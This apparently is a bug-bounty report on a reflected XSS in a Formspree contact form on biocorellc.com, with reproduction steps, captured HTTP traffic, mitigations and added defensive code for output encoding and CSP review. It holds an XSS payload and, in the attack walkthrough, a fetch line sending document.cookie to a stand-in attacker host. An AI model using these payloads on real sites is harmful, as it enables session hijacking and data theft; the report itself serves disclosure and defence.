# Report for Bugcrowd
## Summary
A reflected Cross-Site Scripting (XSS) vulnerability was discovered in the Formspree contact form on the biocorellc.com website. The `message` parameter does not properly sanitize user inputs, allowing for arbitrary JavaScript code execution in the context of the user's browser.
## Affected URL
`https://biocorellc.com/services-capabilities/analytics-ai-machine-learning`
## Vulnerable Parameter
`message`
## Payload
`asd'); alert(document.cookie); //`
## Steps to Reproduce
1. **Navigate to the affected URL.**
- Visit the following page: `https://biocorellc.com/services-capabilities/analytics-ai-machine-learning`.
2. **Open the contact form.**
- Scroll down to the contact form section of the page.
3. **Intercept the form submission using a proxy tool like Burp Suite.**
- Configure your browser to use Burp Suite as a proxy.
- Fill out the contact form with any dummy data in all fields.
- Submit the form and intercept the request in Burp Suite.
4. **Modify the `message` parameter in the intercepted request to include the payload:**
- In Burp Suite, locate the intercepted POST request.
- Modify the `message` parameter to include the payload:
`asd'); alert(document.cookie); //`
5. **Forward the modified request.**
- Forward the modified request to the server.
6. **Observe the JavaScript execution.**
- The browser will execute the injected JavaScript payload.
- An alert box will display the content of `document.cookie`, confirming the XSS vulnerability.
## Evidence
### Intercepted Request
```http
POST /f/xbjvyola HTTP/2
Host: formspree.io
Content-Type: application/x-www-form-urlencoded
Content-Length: 169

first-name=John&last-name=Doe&company=Test&[email protected]&phone-number=1234567890&message=asd'); alert(document.cookie); //&other-fields=test
```
### Server Response
```html
HTTP/2 200 OK
Date: Tue, 09 Jul 2024 13:54:28 GMT
Content-Type: text/html; charset=utf-8
...
<script type="ca5a2d37d431a14461da3a46-text/javascript">
  var appendField = function (form, key, value) {
    var textarea = document.createElement('textarea')
    textarea.setAttribute('name', key)
    textarea.innerHTML = value
    textarea.setAttribute('style', 'display:none')
    form.appendChild(textarea)
  }
  var success = function (response) {
    var form = document.querySelector('#passthrough')
    try {
      // remove data from sessionStorage
      sessionStorage.removeItem('data')
      sessionStorage.removeItem('sorted_keys')
    } catch (e) { }
    // handles the case where user has a button named 'submit'
    document.createElement('form').submit.call(form)
  }
  function onloadCallback () {
    var form = document.querySelector('#passthrough')
    var data = {
      "_referrer": "https://biocorellc.com/services-capabilities/analytics-ai-machine-learning",
      "_submission_ip": "127.0.0.1",
      "_submission_nonce": "17325d6a-bb11-4bf3-984c-9c3ebbfbbd1c",
      "company": "Test",
      "email": "[email protected]",
      "first-name": "John",
      "form-name": "Data Analytics Form",
      "ip-address": "52.91.21.77",
      "last-name": "Doe",
      "message": "asd'); alert(document.cookie); //",
      "other-fields": "test",
      "phone-number": "1234567890"
    }
    var keys = ["first-name", "last-name", "company", "email", "phone-number", "message", "other-fields", "ip-address", "form-name"]
    try {
      if (sessionStorage.getItem('data')) {
        if (Object.keys(data).length > 1) {
          // if data is valid overwrite current storage
          sessionStorage.setItem('data', JSON.stringify(data))
          sessionStorage.setItem('sorted_keys', JSON.stringify(keys))
        } else {
          // passed in blank data except submission_nonce
          data = JSON.parse(sessionStorage.getItem('data'))
          keys = JSON.parse(sessionStorage.getItem('sorted_keys'))
        }
      } else {
        sessionStorage.setItem('data', JSON.stringify(data))
        sessionStorage.setItem('sorted_keys', JSON.stringify(keys))
      }
    } catch (e) {
      /* Safari for iOS in incognito mode doesn't provide sessionStorage. */
    }
    for (var i = 0; i < keys.length; i++) {
      var key = keys[i]
      if (data.hasOwnProperty(key)) {
        appendField(form, key, data[key])
        delete data[key]
      }
    }
    for (var key in data) {
      if (data.hasOwnProperty(key)) {
        appendField(form, key, data[key])
      }
    }
    grecaptcha.render('recaptcha', {
      'sitekey': "6LepugcTAAAAAP0ScLpB1xpKEoZx5CdRn4tBtdH4",
      'callback': success,
      'size': window.innerWidth < 480 ? 'compact' : 'normal',
      'hl': "en"
    })
  }
</script>
```
### Screenshots
1. **Form Submission:**
- Screenshot of the contact form filled with dummy data.
2. **Intercepted Request:**
- Screenshot of the intercepted request in Burp Suite with the modified payload.
3. **Executed Payload:**
- Screenshot of the alert box showing `document.cookie`.
## Impact
The vulnerability allows an attacker to execute arbitrary JavaScript in the context of the victim's browser. This can lead to:
- Session hijacking
- Theft of sensitive information
- Phishing attacks
- Unauthorized actions on behalf of the user
## Recommendations
1. **Sanitize and Escape User Inputs:**
- Properly sanitize and escape all user inputs before reflecting them in the response.
2. **Implement Content Security Policy (CSP):**
- Use CSP to mitigate the risk of XSS by restricting the sources from which scripts can be loaded and executed.
3. **Validate and Encode Data:**
- Implement validation and encoding on both client-side and server-side to ensure inputs are safe and properly formatted.
4. **Regular Security Testing:**
- Conduct regular security testing and code reviews to identify and fix potential vulnerabilities.
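The following is an added example (editor's code, not the report's and not Formspree's) of what recommendations 1 and 3 mean in practice; the Mitigations section further down repeats the same two points. The captured response reflects the submission in two different contexts, as element content (`appendField` assigns it to `innerHTML`) and inside an inline `<script>` as a JSON literal, and each context needs its own encoder. `SAMPLE_SUBMISSION` is constructed from the field values in the report plus one constructed value that targets the script context; the function names are the editor's.

```javascript
// Added example (editor's code, not the report's or Formspree's): context-aware
// output encoding for reflected form submissions, plus the checks a reviewer
// would automate to confirm neither context can be broken out of.

// Constructed sample built from the field values in the report's request, plus
// one constructed value aimed at the <script> context.
const SAMPLE_SUBMISSION = {
  'first-name': 'John',
  'last-name': 'Doe',
  'company': 'Test',
  'message': "asd'); alert(document.cookie); //",
  'other-fields': '</script>', // constructed: would end the enclosing script block if reflected raw
};

// HTML text / double-quoted-attribute context: replace the five characters that
// can change the tokenizer's state.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Inline <script> JSON context: JSON.stringify alone is not enough, because the
// HTML tokenizer sees a literal "</script>" inside a JSON string before any
// JavaScript runs. Replace <, >, & with \u escapes (still valid JSON and valid
// JS), and U+2028/U+2029, which JSON permits raw but older JS engines reject
// inside string literals.
function jsonForScriptTag(obj) {
  return JSON.stringify(obj)
    .replace(/</g, '\\u003c')
    .replace(/>/g, '\\u003e')
    .replace(/&/g, '\\u0026')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

// Dashboard-style rendering of a submission as table rows (text context).
function renderSubmissionHtml(submission) {
  return Object.entries(submission)
    .map(([key, value]) => `<tr><th>${escapeHtml(key)}</th><td>${escapeHtml(value)}</td></tr>`)
    .join('\n');
}

// Passthrough-style inline script like the one in the captured response, with
// the submission embedded via jsonForScriptTag instead of raw JSON.
function renderPassthroughScript(submission) {
  return `<script>var data = ${jsonForScriptTag(submission)}</script>`;
}

// Unsafe variant kept only for comparison: raw JSON.stringify inside <script>.
function renderPassthroughScriptUnsafe(submission) {
  return `<script>var data = ${JSON.stringify(submission)}</script>`;
}

// Check 1: the rendered block must contain exactly one closing script tag, the
// one this renderer wrote. A second one means submitted data ended the script.
function scriptBlockIsIntact(html) {
  const closers = html.match(/<\/script/gi) || [];
  return closers.length === 1;
}

// Check 2: after removing the tags this renderer emits, no angle bracket from
// the submission may survive in the text context.
function rowsContainRawMarkup(rows) {
  const stripped = rows.replace(/<\/?(tr|th|td)>/g, '');
  return /[<>]/.test(stripped);
}

console.log(renderSubmissionHtml(SAMPLE_SUBMISSION));
console.log(renderPassthroughScript(SAMPLE_SUBMISSION));
console.log('encoded script block intact:', scriptBlockIsIntact(renderPassthroughScript(SAMPLE_SUBMISSION)));
console.log('raw JSON script block intact:', scriptBlockIsIntact(renderPassthroughScriptUnsafe(SAMPLE_SUBMISSION)));
```

Two design points: encoding is applied at the moment of output, chosen by the context the value lands in, rather than by "sanitizing" on input, which cannot know the context in advance; and assigning user data to `innerHTML`, as `appendField` does in the captured response, hands it to the HTML parser, whereas `textContent` (or `.value` on a textarea) stores it as text without parsing.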
### Additional Information
- OWASP XSS Prevention Cheat Sheet
- [Content Security Policy (CSP) - MDN Web Docs](https://developer.mozilla.org/en-US/docs/Web/HTTP/CSP)
By providing detailed and clear information, you will help the security team understand and reproduce the issue, leading to a quicker resolution and patch.
### Potential Exploit Scenario
#### Context:
1. **Form Submission:** The form on `biocorellc.com` uses Formspree.io to handle form submissions. When a user submits the form, the data, including the `message` parameter, is sent to Formspree.io.
2. **Dashboard Handling:** Formspree.io has a dashboard where users (the owners of the forms) can view the submissions they have received.
#### Attack Steps:
1. **Crafting the Malicious Payload:**
- An attacker crafts a payload designed to execute JavaScript when viewed in the Formspree.io dashboard.
- Example payload: `'); alert(document.cookie); //`
2. **Submitting the Form:**
- The attacker submits the form on `biocorellc.com` with the malicious payload in the `message` field.
- The form data is sent to Formspree.io, including the malicious payload.
3. **Viewing the Submission:**
- When the owner of the form logs into the Formspree.io dashboard to view submissions, the dashboard will render the submitted data.
- If the Formspree.io dashboard does not properly sanitize and escape the form data, the JavaScript payload will execute in the context of the owner’s browser.
4. **Exploiting the XSS:**
- The JavaScript payload can perform actions such as:
- Stealing session cookies: `document.cookie`
- Sending HTTP requests to other endpoints to exfiltrate data
- Executing further malicious scripts
- Manipulating the dashboard or performing actions on behalf of the logged-in user
#### Potential Impacts:
1. **Session Hijacking:**
- The attacker can steal the session cookie of the Formspree.io dashboard user and impersonate them.
- This can lead to unauthorized access to sensitive information or administrative functions.
2. **Data Theft:**
- The attacker can access and steal data from the Formspree.io dashboard, including other form submissions.
3. **Phishing and Social Engineering:**
- The attacker can use the stolen session to send phishing messages to other users or perform social engineering attacks.
4. **Further Exploitation:**
- The attacker can inject additional payloads to spread the attack within the organization, potentially compromising more systems or data.
### Example Attack Walkthrough:
1. **Submission with Payload:**
- The attacker fills out the form on `biocorellc.com` with the payload: `'); alert(document.cookie); //` in the `message` field.
- This payload is encoded and submitted to Formspree.io.
2. **Interception and Modification:**
- Using a tool like Burp Suite, the attacker intercepts the form submission request and ensures the payload is correctly formatted and injected.
3. **Dashboard Rendering:**
- When the form owner logs into Formspree.io and views the submission, the payload is executed.
- An alert box displaying `document.cookie` appears, indicating the payload execution.
4. **Cookie Theft:**
- Instead of a simple alert, the payload can be modified to send the cookie to an attacker-controlled server:
```javascript
<script>fetch('https://attacker.com/steal?cookie=' + document.cookie);</script>
```
5. **Session Hijack:**
- The attacker uses the stolen session cookie to access the Formspree.io dashboard without authentication.
### Mitigations:
1. **Sanitization and Escaping:**
- Ensure all user-submitted data is properly sanitized and escaped before rendering in the dashboard.
2. **Content Security Policy (CSP):**
- Implement a strict CSP to limit the sources from which scripts can be executed.
3. **Input Validation:**
- Validate and sanitize inputs on both client-side and server-side to prevent malicious code from being submitted.
4. **Security Awareness:**
- Educate users and administrators about the risks of XSS and how to recognize suspicious activity.
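As an added example (editor's code, not the report's and not Formspree's) for mitigation 2 here and recommendation 2 above: a Content-Security-Policy is only a mitigation for reflected XSS if the policy actually refuses inline scripts that lack the response's nonce. The block below parses a CSP header the way browsers do (first occurrence of a directive wins, `script-src` falls back to `default-src`), reports whether an injected inline `<script>` would still run, and builds the nonce-based policy the recommendation asks for. The function names and the sample policies are the editor's; the nonce value is a constructed constant for the demo.

```javascript
// Added example (editor's code, not the report's or Formspree's): parse a
// Content-Security-Policy header and decide whether it still lets an injected
// inline script run. This is the review check to apply to whatever policy the
// CSP mitigation ends up deploying.

// Split a header value into directives. Per the CSP spec, when a directive name
// appears more than once the first occurrence wins and later ones are ignored.
function parseCsp(header) {
  const policy = new Map();
  for (const part of header.split(';')) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length === 0) continue;
    const name = tokens[0].toLowerCase();
    if (!policy.has(name)) policy.set(name, tokens.slice(1));
  }
  return policy;
}

// Source list that governs script execution: script-src, else default-src,
// else nothing in the policy restricts scripts at all.
function effectiveScriptSrc(policy) {
  if (policy.has('script-src')) return policy.get('script-src');
  if (policy.has('default-src')) return policy.get('default-src');
  return null;
}

// True when a reflected <script> block (no nonce attribute, hash unknown to the
// policy) would execute under this header.
function allowsInjectedInlineScript(header) {
  const sources = effectiveScriptSrc(parseCsp(header));
  if (sources === null) return true;
  const lower = sources.map((s) => s.toLowerCase());
  const hasNonceOrHash = lower.some((s) => /^'(nonce-|sha(256|384|512)-)/.test(s));
  // 'unsafe-inline' only takes effect when no nonce or hash source is present;
  // CSP Level 2 and later browsers ignore it otherwise.
  return lower.includes("'unsafe-inline'") && !hasNonceOrHash;
}

// The policy the recommendation asks for: inline scripts run only when their
// tag carries the per-response nonce. The nonce must come from a CSPRNG and be
// regenerated for every response; it is passed in so the caller controls that.
function buildStrictCsp(nonce) {
  return [
    "default-src 'self'",
    // 'strict-dynamic' lets a nonced script (for example a CAPTCHA loader) add
    // further scripts itself without the policy listing every third-party host.
    `script-src 'nonce-${nonce}' 'strict-dynamic'`,
    "object-src 'none'",
    "base-uri 'none'",
  ].join('; ');
}

// Side by side: a common permissive policy next to the strict one.
const WEAK_CSP = "default-src 'self'; script-src 'self' 'unsafe-inline' https:";
const STRICT_CSP = buildStrictCsp('c29tZS1yYW5kb20tbm9uY2U'); // constructed nonce for the demo

console.log('weak policy allows injected inline script:', allowsInjectedInlineScript(WEAK_CSP));
console.log('strict policy allows injected inline script:', allowsInjectedInlineScript(STRICT_CSP));
```

Run it against the header a staging deployment actually returns, not the one in the configuration file: intermediaries and framework defaults frequently add a second `script-src` or an `'unsafe-inline'` that silently undoes the intended policy, and the first-occurrence rule means the order of those additions decides what the browser enforces.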
By reporting this vulnerability, you can help improve the security of Formspree.io and protect users from potential attacks. Make sure to provide detailed evidence and recommendations in your bug report to facilitate a quick and effective resolution.